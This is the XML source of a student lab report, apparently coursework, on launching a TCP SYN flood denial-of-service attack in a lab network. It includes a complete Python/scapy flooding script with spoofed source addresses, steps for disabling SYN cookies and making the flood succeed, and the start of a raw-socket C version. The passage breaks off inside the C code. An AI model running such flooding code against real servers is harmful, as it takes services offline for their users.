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15CB3" w14:textId="533B9EB6" w:rsidR="004D210C" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001641A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Lab 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144917F" w14:textId="2E8E85C3" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9"/>
    <w:p w14:paraId="2CAE4E67" w14:textId="0AED0C61" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001641A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 1: SYN Flooding Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2FAA76" w14:textId="187F28AD" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>This task is aimed at implementing the SYN flood attack. It is a Denial of Service (DoS) attack which sends several SYN requests to the TCP server but has no intention of completing the 3-way handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614825C6" w14:textId="7EEF6B89" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>This attack relies on the fact that the server has limited space in the queue which stores the half-open connections. By flooding this queue, we can ensure that the server cannot service any new requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD6865" w14:textId="71EB58F9" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>Ubuntu has a built-in mechanism for preventing this attack, so we need to disable it first before completing the sub-tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC13F4A" w14:textId="42C80ED3" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r>
        <w:t>For all the subsequent tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED9E28" w14:textId="1EA4A75B" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="004F43B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attacker is the host VM: 10.9.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB50788" w14:textId="54B21687" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="004F43B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Victim is the server 10.9.0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F170A31" w14:textId="5EABA709" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="004F43B7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>User1 is the host 10.9.0.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFE7392" w14:textId="3D04A9A5" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001641A9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 1.1: Launching the Attack Using Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF91A10" w14:textId="2B4B3257" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>This task involves launching the SYN flood attack using a python script utilizing scapy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8065F3" w14:textId="5F38DF89" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001641A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Source Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0297B7D8" w14:textId="47B3B569" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>#!/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11748528" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>from scapy.all import IP, TCP, send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E24FF0A" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>from ipaddress import IPv4Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C58F342" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>from random import getrandbits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B78EF89" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9"/>
    <w:p w14:paraId="198A3C54" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>ip  = IP(dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6739292C" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>tcp = TCP(dport=23, flags='S')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ED61D7" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>pkt = ip/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCF3B51" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9"/>
    <w:p w14:paraId="48234D78" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FD388" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t xml:space="preserve">    pkt[IP].src   = str(IPv4Address(getrandbits(32))) # source ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3042C134" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t xml:space="preserve">    pkt[IP].sport = getrandbits(16)     # source port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFAB598" w14:textId="77777777" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t xml:space="preserve">    pkt[IP].seq   = getrandbits(32)     # sequence number </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E47B64" w14:textId="54435B67" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9">
      <w:r>
        <w:t xml:space="preserve">    send(pkt, verbose = 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37166B97" w14:textId="0629FA2D" w:rsidR="001641A9" w:rsidRDefault="001641A9" w:rsidP="001641A9"/>
    <w:p w14:paraId="136F4F5E" w14:textId="30447369" w:rsidR="000D3536" w:rsidRDefault="000D3536" w:rsidP="001641A9"/>
    <w:p w14:paraId="6B1621C8" w14:textId="77777777" w:rsidR="000D3536" w:rsidRDefault="000D3536" w:rsidP="001641A9"/>
    <w:p w14:paraId="5BBD4A7C" w14:textId="4B1AF303" w:rsidR="001641A9" w:rsidRDefault="000D3536" w:rsidP="001641A9">
      <w:r>
        <w:t>First, I ensured that the SYN flooding countermeasure has been disabled:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F39591" w14:textId="43EDE6C9" w:rsidR="000D3536" w:rsidRDefault="000D3536" w:rsidP="001641A9">
      <w:r w:rsidRPr="000D3536">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D4B6CF3" wp14:editId="6704F312">
            <wp:extent cx="4013200" cy="2804095"/>
            <wp:effectExtent l="0" t="0" r="6350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3520" cy="281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806B" w14:textId="440188BF" w:rsidR="000D3536" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r>
        <w:t>Then, after launching the attack, I checked the TCP network traffic. The queue is almost full (except the 1/4</w:t>
      </w:r>
      <w:r w:rsidRPr="004F43B7">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> part reserved by the system):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD3F5D5" w14:textId="58BF8DE9" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r w:rsidRPr="004F43B7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47B41BE7" wp14:editId="7B3D1BD8">
            <wp:extent cx="5943600" cy="1423670"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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F8B85" w14:textId="77777777" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9"/>
    <w:p w14:paraId="245D91E5" w14:textId="77777777" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9"/>
    <w:p w14:paraId="47CC6DFB" w14:textId="77777777" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9"/>
    <w:p w14:paraId="192A064D" w14:textId="77777777" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9"/>
    <w:p w14:paraId="526BFE26" w14:textId="77777777" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9"/>
    <w:p w14:paraId="27E25570" w14:textId="77777777" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9"/>
    <w:p w14:paraId="1758CE05" w14:textId="77777777" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9"/>
    <w:p w14:paraId="48046F28" w14:textId="50E5B4E0" w:rsidR="000D3536" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Finally, to see if the attack was successful, I tried the telnet command from user1. As can be seen from the screenshot below, the attack failed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257482C6" w14:textId="305E14D3" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r w:rsidRPr="004F43B7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E09A5D2" wp14:editId="3298F0E3">
            <wp:extent cx="5137150" cy="2774940"/>
            <wp:effectExtent l="0" t="0" r="6350" b="698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7380" cy="279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1ACC2" w14:textId="785E2D1B" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r>
        <w:t>The primary reason for this is the slow nature of python code as it is an interpreted language.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CF736E" w14:textId="4D915540" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r>
        <w:t>One way to mitigate this is to reduce the queue size for the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54021E25" w14:textId="44F5AE64" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r>
        <w:t>The default queue size is 128 as can be seen here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202FFC36" w14:textId="7C7A6199" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r w:rsidRPr="004F43B7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1251F313" wp14:editId="2E75E90D">
            <wp:extent cx="4806950" cy="1214577"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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4265" cy="122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2E87" w14:textId="53298EEC" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r>
        <w:t>Halving the queue size and rerunning the attack leads to success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5CD42A" w14:textId="68F493EB" w:rsidR="004F43B7" w:rsidRDefault="004F43B7" w:rsidP="001641A9">
      <w:r w:rsidRPr="004F43B7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A7ED835" wp14:editId="169D5149">
            <wp:extent cx="4775818" cy="927100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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3120" cy="93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D490" w14:textId="2C4411AC" w:rsidR="004F43B7" w:rsidRDefault="00745A5A" w:rsidP="001641A9">
      <w:r w:rsidRPr="00745A5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4362753A" wp14:editId="2525142D">
            <wp:extent cx="4794250" cy="1191392"/>
            <wp:effectExtent l="0" t="0" r="6350" b="889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944" cy="119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B725" w14:textId="5702AD58" w:rsidR="00745A5A" w:rsidRDefault="0085123B" w:rsidP="001641A9">
      <w:r w:rsidRPr="0085123B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47D1AD78" wp14:editId="1A15F272">
            <wp:extent cx="5943600" cy="1748155"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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7A13" w14:textId="1197AA36" w:rsidR="003F57BE" w:rsidRDefault="0085123B" w:rsidP="001641A9">
      <w:r>
        <w:t>Also, another way to resolve this issue is using multiple instances of the python script. I was able to flood the victim using 2 instances of the script running in parallel, with the default queue size of 128.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0269A54D" w14:textId="29F7199F" w:rsidR="003F57BE" w:rsidRDefault="003F57BE" w:rsidP="001641A9"/>
    <w:p w14:paraId="079EA768" w14:textId="6EA6F12F" w:rsidR="003F57BE" w:rsidRDefault="003F57BE" w:rsidP="003F57BE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F57BE">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 1.2: Launch the Attack Using C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD27B3" w14:textId="257556EF" w:rsidR="003F57BE" w:rsidRDefault="003F57BE" w:rsidP="003F57BE">
      <w:r>
        <w:t>Finally, we can resolve the running time issue by using the C programming language to launch the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2194C97F" w14:textId="3CEA0629" w:rsidR="00451779" w:rsidRPr="00451779" w:rsidRDefault="00451779" w:rsidP="003F57BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451779">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Source Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA2A5E9" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C3A0BA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F9EB8C" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CE0386" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#include &lt;errno.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269DEDB" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#include &lt;time.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229753B9" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2273A3B8" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#include &lt;sys/socket.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495C9692" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#include &lt;netinet/ip.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000938E2" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#include &lt;arpa/inet.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD7E168" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="00EF528A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>/* IP Header */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783E2DB4" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>struct ipheader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C4DBA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  unsigned char      iph_ihl:4, //IP header length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EE96D6" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">                     iph_ver:4; //IP version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611D6768" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  unsigned char      iph_tos; //Type of service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4014EE8D" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  unsigned short int iph_len; //IP Packet length (data + header)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E107508" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  unsigned short int iph_ident; //Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58669DA1" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  unsigned short int iph_flag:3, //Fragmentation flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA0EB7" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">                     iph_offset:13; //Flags offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D36B88" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  unsigned char      iph_ttl; //Time to Live</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D10D5C" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  unsigned char      iph_protocol; //Protocol type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA4ACE" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  unsigned short int iph_chksum; //IP datagram checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33148625" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  struct  in_addr    iph_sourceip; //Source IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356B13F5" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">  struct  in_addr    iph_destip;   //Destination IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E961A9" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F54916B" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="6A5BADD4" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="5A2896E0" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>/* TCP Header */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6230E8B0" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>struct tcpheader {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B9590" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    u_short tcp_sport;               /* source port */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19855ED3" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    u_short tcp_dport;               /* destination port */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C939042" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    u_int   tcp_seq;                 /* sequence number */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3411F205" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    u_int   tcp_ack;                 /* acknowledgement number */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7E6C94" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    u_char  tcp_offx2;               /* data offset, rsvd */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20183D8A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define TH_OFF(th)      (((th)-&gt;tcp_offx2 &amp; 0xf0) &gt;&gt; 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD8D74" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    u_char  tcp_flags;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06288F6F" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define TH_FIN  0x01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D134534" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define TH_SYN  0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4752B85A" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define TH_RST  0x04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B773414" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define TH_PUSH 0x08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3715C5DF" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define TH_ACK  0x10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5954D759" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define TH_URG  0x20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D65B48" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define TH_ECE  0x40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0878ACDB" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define TH_CWR  0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188BFCEA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>#define TH_FLAGS        (TH_FIN|TH_SYN|TH_RST|TH_ACK|TH_URG|TH_ECE|TH_CWR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D726F0E" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    u_short tcp_win;                 /* window */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B41F4" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    u_short tcp_sum;                 /* checksum */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE0DA0" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">    u_short tcp_urp;                 /* urgent pointer */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101D80C1" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E1267B" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779"/>
    <w:p w14:paraId="168E29A2" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>/* Psuedo TCP header */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DFE35F" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>struct pseudo_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622A434" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A023FEC" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">        unsigned saddr, daddr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B2330" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">        unsigned char mbz;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61DC35" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">        unsigned char ptcl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674982CA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">        unsigned short tcpl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2B7FAA" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">        struct tcpheader tcp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD4F09" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t xml:space="preserve">        char payload[1500];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DE189" w14:textId="77777777" w:rsidR="00451779" w:rsidRDefault="00451779" w:rsidP="00451779">
      <w:r>
        <w:t>};</w:t>
      </w:r>
